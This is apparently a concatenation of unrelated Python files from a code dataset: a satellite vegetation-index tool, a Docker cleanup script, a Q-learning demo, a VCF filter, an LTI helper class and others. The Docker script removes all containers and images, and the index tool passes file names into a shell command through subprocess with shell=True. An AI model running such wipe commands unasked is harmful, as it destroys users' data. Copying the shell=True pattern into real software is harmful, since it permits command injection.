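    return nd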
class BandHandler(SensorInfo):
def __init__(self, sensor):
self.sensor = sensor
SensorInfo.__init__(self)
def get_band_order(self):
try:
self.band_order = self.band_orders[self.sensor]
except:
raise ValueError('\n{} is not supported. Choose from: {}'.format(self.sensor, ','.join(self.sensors)))
def stack_bands(self, band_list):
"""
Returns stacked bands in sorted (smallest band to largest band) order.
"""
band_positions = self.get_band_positions(band_list)
return self.meta_info.read(bands2open=band_positions,
i=self.i,
j=self.j,
sort_bands2open=False,
rows=self.n_rows,
cols=self.n_cols,
d_type='float32')
def get_band_positions(self, band_list):
return [self.band_order[img_band] for img_band in band_list]
class VegIndices(BandHandler):
"""
Args:
input_image (str)
input_indice (str)
sensor (str)
mask_band (Optional[int])
"""
def __init__(self, input_image, input_indice, sensor, mask_band=None):
self.input_indice = input_indice
self.mask_band = mask_band
# Get the sensor band order.
BandHandler.__init__(self, sensor)
self.get_band_order()
# Open the image.
self.meta_info = raster_tools.ropen(input_image)
self.rows, self.cols = self.meta_info.rows, self.meta_info.cols
def run(self, output_image, storage='float32',
no_data=0, in_no_data=0, chunk_size=1024, k=0,
be_quiet=False, overwrite=False, overviews=False,
scale_factor=1.):
"""
Args:
output_image (str)
storage (Optional[str])
no_data (Optional[int])
in_no_data (Optional[int])
chunk_size (Optional[int])
k (Optional[int])
be_quiet (Optional[bool])
overwrite (Optional[bool])
overviews (Optional[bool])
scale_factor (Optional[float])
"""
self.output_image = output_image
self.storage = storage
self.no_data = no_data
self.in_no_data = in_no_data
self.chunk_size = chunk_size
self.k = k
self.be_quiet = be_quiet
print_progress = True
if self.storage == 'float32':
self.out_type = 1
elif self.storage == 'byte':
if (self.no_data < 0) or (self.no_data > 255):
raise ValueError("""
The 'no data' value cannot be less than 0 or
greater than 255 with Byte storage.
""")
self.out_type = 2
elif self.storage == 'uint16':
if self.no_data < 0:
raise ValueError("""
The 'no data' value cannot be less than 0
with UInt16 storage.
""")
self.out_type = 3
else:
raise NameError('{} is not a supported storage option.'.format(self.storage))
d_name, f_name = os.path.split(self.output_image)
__, f_ext = os.path.splitext(f_name)
if not os.path.isdir(d_name):
os.makedirs(d_name)
o_info = self.meta_info.copy()
o_info.storage = self.storage
o_info.bands = 1
if self.chunk_size == -1:
block_size_rows = copy(self.rows)
block_size_cols = copy(self.cols)
print_progress = False
else:
# set the block size
block_size_rows, block_size_cols = raster_tools.block_dimensions(self.rows, self.cols,
row_block_size=self.chunk_size,
col_block_size=self.chunk_size)
if overwrite:
associated_files = fnmatch.filter(os.listdir(d_name), '*{}*'.format(f_name))
associated_files = fnmatch.filter(associated_files, '*{}*'.format(f_ext))
if associated_files:
for associated_file in associated_files:
associated_file_full = '{}/{}'.format(d_name, associated_file)
if os.path.isfile(associated_file_full):
os.remove(associated_file_full)
if os.path.isfile(self.output_image):
logger.info('\n{} already exists ...'.format(self.output_image))
else:
out_rst = raster_tools.create_raster(self.output_image, o_info, compress='none')
out_rst.get_band(1)
if not self.be_quiet:
logger.info('\n{} ...\n'.format(self.input_indice.upper()))
if print_progress:
ctr, pbar = _iteration_parameters(self.rows, self.cols, block_size_rows, block_size_cols)
max_ndvi, min_ndvi = 0., 0.
# Iterate over the image block by block.
for self.i in range(0, self.rows, block_size_rows):
self.n_rows = raster_tools.n_rows_cols(self.i, block_size_rows, self.rows)
for self.j in range(0, self.cols, block_size_cols):
self.n_cols = raster_tools.n_rows_cols(self.j, block_size_cols, self.cols)
# Stack the image array with the
# appropriate bands.
try:
if self.input_indice.upper() == 'VCI':
image_stack = self.stack_bands(self.wavelength_lists['NDVI'])
else:
image_stack = self.stack_bands(self.wavelength_lists[self.input_indice.upper()])
except:
raise NameError('{} cannot be computed for {}.'.format(self.input_indice.upper(), self.sensor))
if isinstance(self.mask_band, int):
mask_array = self.meta_info.read(bands2open=self.mask_band,
i=self.i,
j=self.j,
rows=self.n_rows,
cols=self.n_cols,
d_type='byte')
else:
mask_array = None
# Setup the vegetation index object.
vie = VegIndicesEquations(image_stack,
chunk_size=self.chunk_size,
no_data=self.no_data,
in_no_data=self.in_no_data,
mask_array=mask_array)
# Calculate the vegetation index.
veg_indice_array = vie.compute(self.input_indice,
out_type=self.out_type,
scale_factor=scale_factor)
if self.input_indice.upper() == 'VCI':
# get the maximum NDVI value for the image
max_ndvi = max(veg_indice_array.max(), max_ndvi)
                    # get the minimum NDVI value for the image
min_ndvi = min(veg_indice_array.min(), min_ndvi)
                if self.input_indice.upper() != 'VCI':
out_rst.write_array(veg_indice_array, i=self.i, j=self.j)
if not self.be_quiet:
if print_progress:
pbar.update(ctr)
ctr += 1
if not self.be_quiet:
if print_progress:
pbar.finish()
if self.input_indice.upper() == 'VCI':
if not self.be_quiet:
logger.info('\nComputing VCI ...')
            # iterate over the entire image in row/column blocks
for self.i in range(0, self.rows, block_size_rows):
self.n_rows = raster_tools.n_rows_cols(self.i, block_size_rows, self.rows)
for self.j in range(0, self.cols, block_size_cols):
self.n_cols = raster_tools.n_rows_cols(self.j, block_size_cols, self.cols)
# Stack the image array with the
# appropriate bands.
try:
image_stack = self.stack_bands(self.wavelength_lists[self.input_indice.upper()])
except:
raise NameError('{} cannot be computed for {}.'.format(self.input_indice.upper(),
self.sensor))
# Setup the vegetation index object.
vie = VegIndicesEquations(image_stack, chunk_size=self.chunk_size)
# Calculate the VCI index.
veg_indice_array = vie.compute(self.input_indice, out_type=self.out_type,
min_ndvi=min_ndvi, max_ndvi=max_ndvi)
out_rst.write_array(veg_indice_array, i=self.i, j=self.j)
out_rst.close_all()
out_rst = None
if self.k > 0:
print('')
d_name, f_name = os.path.split(self.output_image)
f_base, f_ext = os.path.splitext(f_name)
outImgResamp = '{}/{}_resamp{}'.format(d_name, f_base, f_ext)
comResamp = 'gdalwarp -tr {:f} {:f} -r near {} {}'.format(self.k, self.k,
self.output_image, outImgResamp)
subprocess.call(comResamp, shell=True)
if overviews:
logger.info('\nComputing overviews ...\n')
with raster_tools.ropen(output_image) as v_info:
v_info.build_overviews()
self.meta_info.close()
o_info.close()
self.meta_info = None
o_info = None
def _compute_as_list(img, out_img, sensor, k, storage, no_data, chunk_size,
                     overwrite, overviews, veg_indice_list=None):
    # Avoid a mutable default argument; an empty list (the string 'all' path
    # from veg_indices()) and ['all'] both expand to every index the sensor
    # supports.
    if (not veg_indice_list) or \
            ((len(veg_indice_list) == 1) and (veg_indice_list[0].lower() == 'all')):
si = SensorInfo()
si.list_indice_options(sensor)
veg_indice_list = si.sensor_indices
d_name, f_name = os.path.split(out_img)
f_base, f_ext = os.path.splitext(f_name)
name_list = []
for input_indice in veg_indice_list:
out_img_indice = '{}/{}_{}{}'.format(d_name, f_base, input_indice.lower(), f_ext)
name_list.append(out_img_indice)
vio = VegIndices(img, input_indice, sensor)
vio.run(out_img_indice, k=k, storage=storage, no_data=no_data, chunk_size=chunk_size, overwrite=overwrite)
out_stack = '{}/{}_STACK.vrt'.format(d_name, f_base)
# Stack all the indices.
composite(d_name, out_stack, stack=True, image_list=name_list, build_overviews=overviews, no_data=no_data)
# Save a list of vegetation indice names.
index_order = '{}/{}_STACK_order.txt'.format(d_name, f_base)
with open(index_order, 'w') as tio:
for bi, vi in enumerate(veg_indice_list):
tio.write('{:d}: {}\n'.format(bi+1, vi))
def veg_indices(input_image, output_image, input_index, sensor, k=0.,
storage='float32', no_data=0, in_no_data=0,
chunk_size=-1, be_quiet=False, overwrite=False,
overviews=False, mask_band=None, scale_factor=1.):
"""
    Computes vegetation indices.
Assumes standard band orders for available sensors.
Args:
input_image (str): The input image.
output_image (str): The output image.
input_index (str or str list): Vegetation index or list of indices to compute.
sensor (str): Input sensor. Choices are [ASTER VNIR, CBERS2, CitySphere, GeoEye1, IKONOS, Landsat, Landsat8,
Landsat thermal, MODIS, Pan, RapidEye, Sentinel2-10m (coming), Sentinel2-20m (coming),
Quickbird, WorldView2, WorldView2 PS FC].
k (Optional[float]): Resample size. Default is 0., or no resampling.
storage (Optional[str]): Storage type of ``output_image``. Default is 'float32'. Choices are
            ['byte', 'uint16', 'float32'].
no_data (Optional[int]): The output 'no data' value for ``output_image``. Default is 0.
in_no_data (Optional[int]): The input 'no data' value. Default is 0.
chunk_size (Optional[int]): Size of image chunks. Default is -1. *chunk_size=-1 will use Numexpr
threading. This should give faster results on larger imagery.
be_quiet (Optional[bool]): Whether to print progress (False) or be quiet (True). Default is False.
overwrite (Optional[bool]): Whether to overwrite an existing ``output_image`` file. Default is False.
overviews (Optional[bool]): Whether to build pyramid overviews for ``output_image``. Default is False.
mask_band (Optional[int]): A mask band position to use. Default is None.
Examples:
>>> from mappy.features import veg_indices
>>>
>>> # Compute the NDVI for Landsat (4, 5, or 7).
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat')
>>>
>>> # Compute the NDVI, but save as Byte (0-255) storage.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat', \
>>> storage='byte', overviews=True)
>>>
>>> # Compute the NDVI for Landsat 8.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Landsat8')
>>>
>>> # Compute the NDVI for Sentinel 2.
>>> veg_indices('/some_image.tif', '/some_image_indice.tif', 'NDVI', 'Sentinel2')
Returns:
None, writes to ``output_image``.
Vegetation Indices:
ARVI
Name:
Atmospheric resistant vegetation index
CNDVI
Name:
Corrected normalized difference vegetation index
Eq:
CNDVI = [(nir - Red) / (nir + Red)] * (1 - [(SWIR - SWIRmin) / (SWIRmax - SWIRmin)])
Ref:
Nemani et al. 1993.
EVI
Name:
Enhanced vegetation index
EVI2
GNDVI
Name:
Green normalized difference vegetation index
Eq:
GNDVI = (nir - Green) / (nir + Green)
IPVI
Name:
Infrared Percentage Vegetation Index
Eq:
IPVI = nir / (nir + Red)
Ref:
<NAME>. 1990. "Calculating the Vegetation Index Faster."
Remote Sensing of Environment 34: 71-73.
MNDWI
        MSAVI2 -- computed by the MSAVI method in this module
Name:
Modified Soil Adjusted Vegetation Index
Eq:
MSAVI = ((2 * (nir + 1)) - sqrt(((2 * nir + 1)^2) - (8 * (nir - Red)))) / 2
Ref:
<NAME>., <NAME>., <NAME>., and <NAME>. 1994.
"Modified Soil Adjusted Vegetation Index (MSAVI)." Remote Sensing
of Environment 48: 119-126.
NDBI
NDBaI
Name:
Normalized difference bareness index
NDVI
Name:
Normalized Difference Vegetation Index
Eq:
            NDVI = (nir - Red) / (nir + Red)
        Ref:
            <NAME>., <NAME>., <NAME>., and <NAME>. 1973.
                "Monitoring vegetation systems in the Great Plains with ERTS."
                Third ERTS Symposium, NASA SP-351 1: 309-317.
<NAME>., <NAME>., <NAME>., and <NAME>.
1969. "Preprocessing transformations and their effects on
multispectral recognition." in Proceedings of the Sixth
International Symposium on Remote Sensing of Environment,
University of Michigan, Ann Arbor, MI: 97-131.
ONDVI
Name:
Theta normalized difference vegetation index
Eq:
(4 / pi) * arctan(NDVI)
NDWI
Name:
Normalized difference water index or moisture index
pNDVI
Name:
Pseudo normalized difference vegetation index
Eq:
pNDVI = (Red - Green) / (Red + Green)
RBVI
SATVI
SAVI
Name:
Soil Adjusted Vegetation Index
Eq:
SAVI = ((nir - Red) / (nir + Red + L)) * (1 + L)
where, L=0.--1. (high--low vegetation cover)
Ref:
<NAME>. 1988. "A soil-adjusted vegetation index (SAVI)." Remote Sensing of
Environment 25, 295-309.
SVI (or RVI)
Name:
Simple Vegetation Index (or Ratio Vegetation Index)
Eq:
RVI = nir / Red
Ref:
Jordan, C.F. 1969. "Derivation of leaf area index from quality of
light on the forest floor." Ecology 50: 663-666.
TSAVI -- not used
Name:
Transformed Soil Adjusted Vegetation Index
Eq:
TSAVI = s(nir - s * Red - a) / (a * nir + red - a * s + X * (1 + s * s))
Ref:
<NAME>., <NAME>., and <NAME>. 1989. "TSAVI: A vegetation
index which minimizes soil brightness effects on LAI or APAR
estimation." in 12th Canadian Symposium on Remote Sensing and
IGARSS 1990, Vancouver, Canada, July 10-14.
<NAME>. and <NAME>. 1991. "Potentials and limits of vegetation
indices for LAI and APAR assessment." Remote Sensing of
Environment 35: 161-173.
TNDVI
TVI
"""
if isinstance(input_index, str):
if input_index.lower() == 'all':
_compute_as_list(input_image, output_image, sensor, k, storage, no_data,
chunk_size, overwrite, overviews)
else:
vio = VegIndices(input_image, input_index, sensor, mask_band=mask_band)
vio.run(output_image, k=k, storage=storage, no_data=no_data, in_no_data=in_no_data,
chunk_size=chunk_size, be_quiet=be_quiet, overwrite=overwrite, overviews=overviews,
scale_factor=scale_factor)
if isinstance(input_index, list):
if (len(input_index) == 1) and (input_index[0].lower() != 'all'):
vio = VegIndices(input_image, input_index[0], sensor, mask_band=mask_band)
vio.run(output_image, k=k, storage=storage, no_data=no_data, in_no_data=in_no_data,
chunk_size=chunk_size, be_quiet=be_quiet, overwrite=overwrite, overviews=overviews,
scale_factor=scale_factor)
else:
_compute_as_list(input_image, output_image, sensor, k, storage, no_data,
chunk_size, overwrite, overviews, veg_indice_list=input_index)
def _examples():
sys.exit("""\
# List vegetation index options for a sensor.
veg-indices --sensor Landsat --options
# List the expected band order for a sensor.
veg-indices --sensor Landsat --band_order
veg-indices --sensor Landsat8 --band_order
veg-indices --sensor Landsat-thermal --band_order
veg-indices --sensor Sentinel2 --band_order
veg-indices --sensor Quickbird --band_order
veg-indices --sensor RGB --band_order
# Compute NDVI for a Landsat image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Landsat
# Compute NDVI for a Landsat8 image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Landsat8
# Compute NDVI for a Sentinel 2 image.
veg-indices -i /some_image.tif -o /ndvi.tif --index ndvi --sensor Sentinel2
# Compute NDWI for a Landsat image and save as Byte (0-255) storage.
veg-indices -i /some_image.tif -o /ndwi.tif --index ndwi --sensor Landsat --storage byte --overviews
# Compute NDSI for a Landsat image, save as float32 storage, and set 'no data' pixels to -999.
veg-indices -i /some_image.tif -o /ndsi.tif --index ndsi --sensor Landsat --overviews --no_data -999
# Compute NDVI and SAVI for a Landsat image. The --chunk -1 parameter tells the
# system to use 'numexpr' for calculations.
#
# *Each output image will be saved as /output_ndvi.tif, /output_savi.tif AND
# a VRT multi-band image will be saved as /output_STACK.vrt. Unlike single index
# triggers, if --index is a list of more than one index, the --overviews parameter
# will only build overviews for the VRT file.
veg-indices -i /some_image.tif -o /output.tif --index ndvi savi --sensor Landsat --overviews --chunk -1
# Compute all available indices for Landsat.
veg-indices -i /some_image.tif -o /output.tif --index all --sensor Landsat
""")
def main():
parser = argparse.ArgumentParser(description='Computes spectral indices and band ratios',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e', '--examples', dest='examples', action='store_true', help='Show usage examples and exit')
parser.add_argument('-i', '--input', dest='input', help='The input image', default=None)
parser.add_argument('-o', '--output', dest='output', help='The output image', default=None)
parser.add_argument('--index', dest='index', help='The vegetation index to compute', default=['ndvi'], nargs='+')
parser.add_argument('--sensor', dest='sensor', help='The input sensor', default='Landsat',
choices=SensorInfo().sensors)
parser.add_argument('-k', '--resample', dest='resample', help='Resample cell size', default=0., type=float)
parser.add_argument('-s', '--storage', dest='storage', help='The storage type', default='float32')
parser.add_argument('-n', '--no_data', dest='no_data', help='The output "no data" value', default=0, type=int)
parser.add_argument('-c', '--chunk', dest='chunk', help='The chunk size', default=1024, type=int)
parser.add_argument('-q', '--be_quiet', dest='be_quiet', help='Whether to be quiet', action='store_true')
parser.add_argument('--overwrite', dest='overwrite', help='Whether to overwrite an existing file',
action='store_true')
parser.add_argument('--overviews', dest='overviews', help='Whether to build pyramid overviews',
action='store_true')
parser.add_argument('--options', dest='options',
help='Whether to list the vegetation index options for the sensor, --sensor',
action='store_true')
parser.add_argument('--band_order', dest='band_order',
help='Whether to list the expected band order for the sensor, --sensor',
action='store_true')
args = parser.parse_args()
if args.options:
si = SensorInfo()
si.list_indice_options(args.sensor)
sys.exit("""\
Available indices for {}:
{}
""".format(args.sensor, ', '.join(si.sensor_indices)))
if args.band_order:
si = SensorInfo()
sys.exit(si.list_expected_band_order(args.sensor))
if args.examples:
_examples()
logger.info('\nStart date & time --- (%s)\n' % time.asctime(time.localtime(time.time())))
start_time = time.time()
veg_indices(args.input, args.output, args.index, args.sensor, k=args.resample, storage=args.storage,
no_data=args.no_data, chunk_size=args.chunk, be_quiet=args.be_quiet,
overwrite=args.overwrite, overviews=args.overviews)
    logger.info('\nEnd date & time -- (%s)\nTotal processing time -- (%.2gs)\n' %
(time.asctime(time.localtime(time.time())), (time.time()-start_time)))
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3584493
|
<gh_stars>1-10
#!/usr/bin/env python
from shellcall import ShellCall
# Delete all containers
ShellCall("docker rm $(docker ps -a -q)")
# Delete all images
ShellCall("docker rmi $(docker images -q)")
|
StarcoderdataPython
|
21043
|
import pyblaze.nn.data.extensions
from .noise import NoiseDataset, LabeledNoiseDataset
from .zip import ZipDataLoader
from .transform import TransformDataset
|
StarcoderdataPython
|
189835
|
from pylps.core import *
initialise(max_time=5)
create_actions('show(_)')
create_events('handle_list(_)')
create_variables('X', 'XS')
reactive_rule(True).then(
handle_list(['a', 'b', 'c', 'd']).frm(T1, T2)
)
goal(handle_list([X]).frm(T1, T2)).requires(
show([X]).frm(T1, T2)
)
goal(handle_list([X | XS]).frm(T1, T2)).requires(
show([X]).frm(T1, T2),
handle_list(XS).frm(T1, T2)
)
execute(single_clause=False)
show_kb_log()
'''
actions show(_).
if true
then handle_list([a,b,c,d]) from T1 to T2.
handle_list([Single]) from T1 to T2 if show([Single]) from T1 to T2.
handle_list([X|Xs]) from T1 to T3 if
show([X]) from T1 to T2,
handle_list(Xs) from T2 to T3.
show([a]) 1 2
show([b]) 2 3
show([c]) 3 4
show([d]) 4 5
'''
|
StarcoderdataPython
|
1877223
|
<reponame>ChyiYaqing/chyidlTutorial
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# array_fixed_size_CURD_implement.py
# python
#
# 🎂"Here's to the crazy ones. The misfits. The rebels.
# The troublemakers. The round pegs in the square holes.
# The ones who see things differently. They're not fond
# of rules. And they have no respect for the status quo.
# You can quote them, disagree with them, glorify or vilify
# them. About the only thing you can't do is ignore them.
# Because they change things. They push the human race forward.
# And while some may see them as the crazy ones, we see genius.
# Because the people who are crazy enough to think they can change
# the world, are the ones who do."
#
# Created by <NAME> on 02/28/19 13:50.
# Copyright © 2019. <NAME>.
# All rights reserved.
#
# Distributed under terms of the
# MIT
"""
Implement a fixed-size array that supports dynamic add, delete, update and read
"""
import ctypes # A foreign function library for Python
class FixedSizeArray:
# Fixed Size Array class
def __init__(self, capacity):
self.n = 0 # Count actual element (Default is 0)
self.capacity = capacity # Default Capacity
self.A = self.make_array(self.capacity)
def __len__(self):
# Return number of elements stored in array
return self.n
def __repr__(self):
# "official" string representation of an object
return ",".join(str(self.A[i]) for i in range(self.n))
def __getitem__(self, index):
# Return element at index
index = self.checkindex(index)
return self.A[index] # Retrieve from the array at index
    def append(self, ele):
        # Insert element at its sorted position, shifting larger items right
        if self.n == self.capacity:
            raise RuntimeError('fixed size Array {} is full'.format(self.n))
        # find the first index whose value exceeds ele
        pos = self.n
        for i in range(self.n):
            if self.A[i] > ele:
                pos = i
                break
        # open a slot by shifting the tail one position to the right
        for i in range(self.n, pos, -1):
            self.A[i] = self.A[i - 1]
        self.A[pos] = ele
        self.n += 1
def delete(self, idx):
# delete element in idx
idx = self.checkindex(idx)
for i in range(idx, self.n-1):
self.A[i] = self.A[i+1]
self.n -= 1
def update(self, idx, ele):
# update element in idx to ele
self.delete(idx)
self.append(ele)
def checkindex(self, idx):
if idx < 0: # Support negative numbers index
idx = self.n + idx
if not 0 <= idx < self.n:
            raise IndexError('idx = {} is out of bounds!'.format(idx))
return idx
def make_array(self, cap):
# Returns a array with capacity
return (cap * ctypes.py_object)()
if __name__ == '__main__':
arr = FixedSizeArray(10)
for ele in range(5, -1, -1):
arr.append(ele)
print("Print order array")
print(arr)
print("Delete element in index = {}".format(2))
arr.delete(2)
print("Print order array")
print(arr)
print("Update element in index = {}, ele = {}".format(0, 1024))
arr.update(0, 1024)
print("Print order array")
print(arr)
|
StarcoderdataPython
|
9728505
|
<reponame>wangvictor2012/liuwei<gh_stars>0
"""
Mockup classes used in unit tests.
"""
class FakeProcess(object):
def __init__(self):
self.regs = {}
def setreg(self, name, value):
self.regs[name] = value
def getreg(self, name):
return self.regs[name]
|
StarcoderdataPython
|
1792358
|
from setuptools import find_packages
from setuptools import setup
long_description = """
This will be a new type of Gherkin/BDD implementation for Pytest. It is based on the Gherkin library and Pytest framework.
"""
setup(
name="pytest-gherkin",
version="0.1",
url="https://github.com/bigbirdcode",
license="MIT License",
author="BigBirdCode",
author_email="na",
description="Gherkin/BDD implementation for Pytest",
long_description=long_description,
classifiers=[
"Development Status :: 3 - Alpha",
"Framework :: Pytest",
"Environment :: Desktop Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Topic :: Development",
"Topic :: Testing",
],
packages=find_packages("src"),
package_dir={"": "src"},
python_requires=">=3.7",
install_requires=["pytest>=5.3.2", "gherkin-official>=4.1.3", "parse>1.12.0"],
extras_require={"dev": ["flake8", "pylint", "black"]},
entry_points={"pytest11": ["pytest_gherkin = pt_gh.plugin"]},
)
|
StarcoderdataPython
|
6497372
|
from .launch_params import LaunchParams, valid_param
ROLES_STUDENT = ['student', 'learner']
ROLES_INSTRUCTOR = ['instructor', 'faculty', 'staff']
class ToolBase(object):
def __init__(self, consumer_key=None, consumer_secret=None, params=None):
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
if params is None:
params = {}
if isinstance(params, LaunchParams):
self.launch_params = params
else:
self.launch_params = LaunchParams(params)
def __getattr__(self, attr):
if not valid_param(attr):
raise AttributeError(
"{} is not a valid launch param attribute".format(attr))
try:
return self.launch_params[attr]
except KeyError:
return None
def __setattr__(self, key, value):
if valid_param(key):
self.launch_params[key] = value
else:
self.__dict__[key] = value
def has_role(self, role):
return self.launch_params.get('roles') and any(
x.lower() == role.lower() for x in self.launch_params['roles'])
def is_student(self):
return any(self.has_role(x) for x in ROLES_STUDENT)
def is_instructor(self):
return any(self.has_role(x) for x in ROLES_INSTRUCTOR)
def is_launch_request(self):
msg_type = self.launch_params.get('lti_message_type')
return msg_type == 'basic-lti-launch-request'
def is_content_request(self):
msg_type = self.launch_params.get('lti_message_type')
return msg_type == 'ContentItemSelectionRequest'
def set_custom_param(self, key, val):
setattr(self, 'custom_' + key, val)
def get_custom_param(self, key):
return getattr(self, 'custom_' + key)
def set_non_spec_param(self, key, val):
self.launch_params.set_non_spec_param(key, val)
def get_non_spec_param(self, key):
return self.launch_params.get_non_spec_param(key)
def set_ext_param(self, key, val):
setattr(self, 'ext_' + key, val)
def get_ext_param(self, key):
return getattr(self, 'ext_' + key)
def to_params(self):
params = dict(self.launch_params)
# stringify any list values
for k, v in params.items():
if isinstance(v, list):
params[k] = ','.join(v)
return params
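# Hedged usage sketch (illustrative only; assumes LaunchParams accepts the
# standard LTI keys used below):
#
#   tool = ToolBase(params={'lti_message_type': 'basic-lti-launch-request',
#                           'roles': ['Instructor']})
#   tool.is_launch_request()   # True
#   tool.is_instructor()       # True
#   tool.is_student()          # False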
|
StarcoderdataPython
|
6539641
|
<reponame>shr-project/Scenic
from .common import scenicToWebotsPosition, scenicToWebotsRotation
|
StarcoderdataPython
|
8045015
|
#!/usr/bin/env python
'''
Copyright (c) Sentieon Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import argparse
import sys
import gzip
from operator import attrgetter
from Variant import Variant
class Variant(Variant):
def __init__(self, line):
cols = line.split("\t")
if len(cols) <= 10:
            raise IndexError('Variant has 10 or fewer columns.')
super().__init__(line)
@property
def alt_count(self):
try:
alt = int(self.samples[0]['AD'].split(",")[1])
except KeyError:
alt = 0
return alt
def triallelic_filter(block, args):
block.sort(reverse=True, key=attrgetter("qual", "alt_count"))
output = []
if args.mode == 1:
output = block[:args.N]
else:
thresh = block[0].qual * args.N / 100
for i in range(len(block)):
if block[i].qual < thresh:
break
else:
i = len(block)
output = block[:i]
for var in output:
cols = var.line.split("\t")
filter_col = cols[6].split(";")
filter_col.remove("triallelic_site")
if len(filter_col) == 0:
cols[6] = "PASS"
else:
cols[6] = ";".join(filter_col)
print("\t".join(cols), end="\n")
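# Worked example of the mode-2 threshold above (illustrative numbers): if
# the best record in a block has QUAL=200 and N=80, thresh = 200 * 80 / 100
# = 160, so every record with QUAL >= 160 is kept and re-emitted with its
# "triallelic_site" filter entry removed.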
def process_args():
parser = argparse.ArgumentParser(description='Process triallelic sites.')
parser.add_argument('-i', '--input', metavar='VCF',
help='Input VCF file name, required', required=True)
parser.add_argument('-m', '--mode', metavar='MODE',
help='1) Keep top N variants. '
'2) Keep variants with QUAL higher than N%% '
'of the highest. Default: 1', type=int, default=1)
parser.add_argument('-N', metavar='Parameter',
help='See --mode for more information. '
'Default: 1', type=int, default=1)
parser.add_argument('--ignore_non_pass',
help='Ignore and remove non-pass triallelic sites.',
action='store_true')
return parser.parse_args()
def main():
args = process_args()
if args.input.endswith("gz"):
VCFfile = gzip.open(args.input, 'rt')
else:
VCFfile = open(args.input)
block = []
chrom = ""
pos = 0
for line in VCFfile:
if line.startswith("#"):
print(line, end="")
else:
var = Variant(line)
if "triallelic_site" in var.filter:
if args.ignore_non_pass and len(var.filter) > 1:
continue
if block:
if var.chrom != chrom or var.pos != pos:
triallelic_filter(block, args)
block = [Variant(line)]
chrom = var.chrom
pos = var.pos
else:
block.append(Variant(line))
else:
chrom = var.chrom
pos = var.pos
block = [Variant(line)]
else:
if block:
triallelic_filter(block, args)
block = []
print(line, end="")
if block:
triallelic_filter(block, args)
if __name__ == '__main__':
sys.exit(main())
# vim: ts=4 sw=4 expandtab
|
StarcoderdataPython
|
1941813
|
<filename>TD/q_learning/simple_q_learning.py
#http://mnemstudio.org/path-finding-q-learning-tutorial.htm
#provide two different criteria for the q-learning update
import numpy as np
#initialize q function
q = np.matrix(np.zeros([6,6]))
# r is the tabular representation for rewards
r = np.matrix([[-1,-1,-1,-1,0,-1],
[-1,-1,-1,0,-1,100],
[-1,-1,-1,0,-1,-1],
[-1,0,0,-1,0,-1],
[0,-1,-1,0,-1,100],
[-1,0,-1,-1,0,100]])
#hyperparameter
gamma = 0.8
epsilon = 0.4
alpha = 0.1 #learning rate
#the main training loop
for episode in range(101):
#random initial state
state = np.random.randint(0,6)
while (state!=5):
possible_actions = []
possible_q = []
for action in range(6):
#loop through all actions, choose rules-allowed actions
if r[state,action] >= 0:
possible_actions.append(action)
possible_q.append(q[state,action])
#step next state, here we use epsilon-greedy algo
action = -1
if np.random.random() < epsilon:
#choose random action
action = possible_actions[np.random.randint(0,len(possible_actions))]
else:
#greedy
action = possible_actions[np.argmax(possible_q)]
#update q value
#method1
#q[state,action] = r[state,action] + gamma * q[action].max()
#method2
rs = r[state,action]
re = gamma * q[action].max()
cur_r = q[state, action]
td = rs+re-cur_r
print(f'next immediate reward is: {r[action,np.argmax(q[action])]}')
print(f'future reward is: {gamma*q[action].max()}')
print(f'current future reward is: {q[state,action]}')
        #q[state,action] += alpha * (rs + re - cur_r)
        #q[state,action] += alpha * (r[action,np.argmax(q[action])] + gamma * q[action].max() - q[state,action])
q[state,action] += alpha * td
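        # Worked example of the TD update above (hypothetical numbers): with
        # alpha=0.1, gamma=0.8, immediate reward rs=100, discounted future
        # reward re=0.8*50=40 and current estimate cur_r=10,
        # td = 100 + 40 - 10 = 130, so q[state,action] moves from 10 to
        # 10 + 0.1*130 = 23.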
#go to the next state
state = action
    if episode % 10 == 0:
print('_________________________________________')
print('training episode: %d' % episode)
print(q)
for i in range(10):
print('episode: %d' %i)
#random initial state
state = np.random.randint(0,6)
print(f'robot starts at {state}')
for _ in range(20):
if state == 5:
break
action = np.argmax(q[state])
print(f'the robot goes to {action}')
state = action
|
StarcoderdataPython
|
3444500
|
<reponame>AndrewLester/2020-robot
from typing import get_type_hints
class FakeImpl:
def __init__(self, *args, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __getattribute__(self, attr):
return FakeImpl()
def __call__(self, *args, **kwargs):
return FakeImpl(*args, **kwargs)
|
StarcoderdataPython
|
375647
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
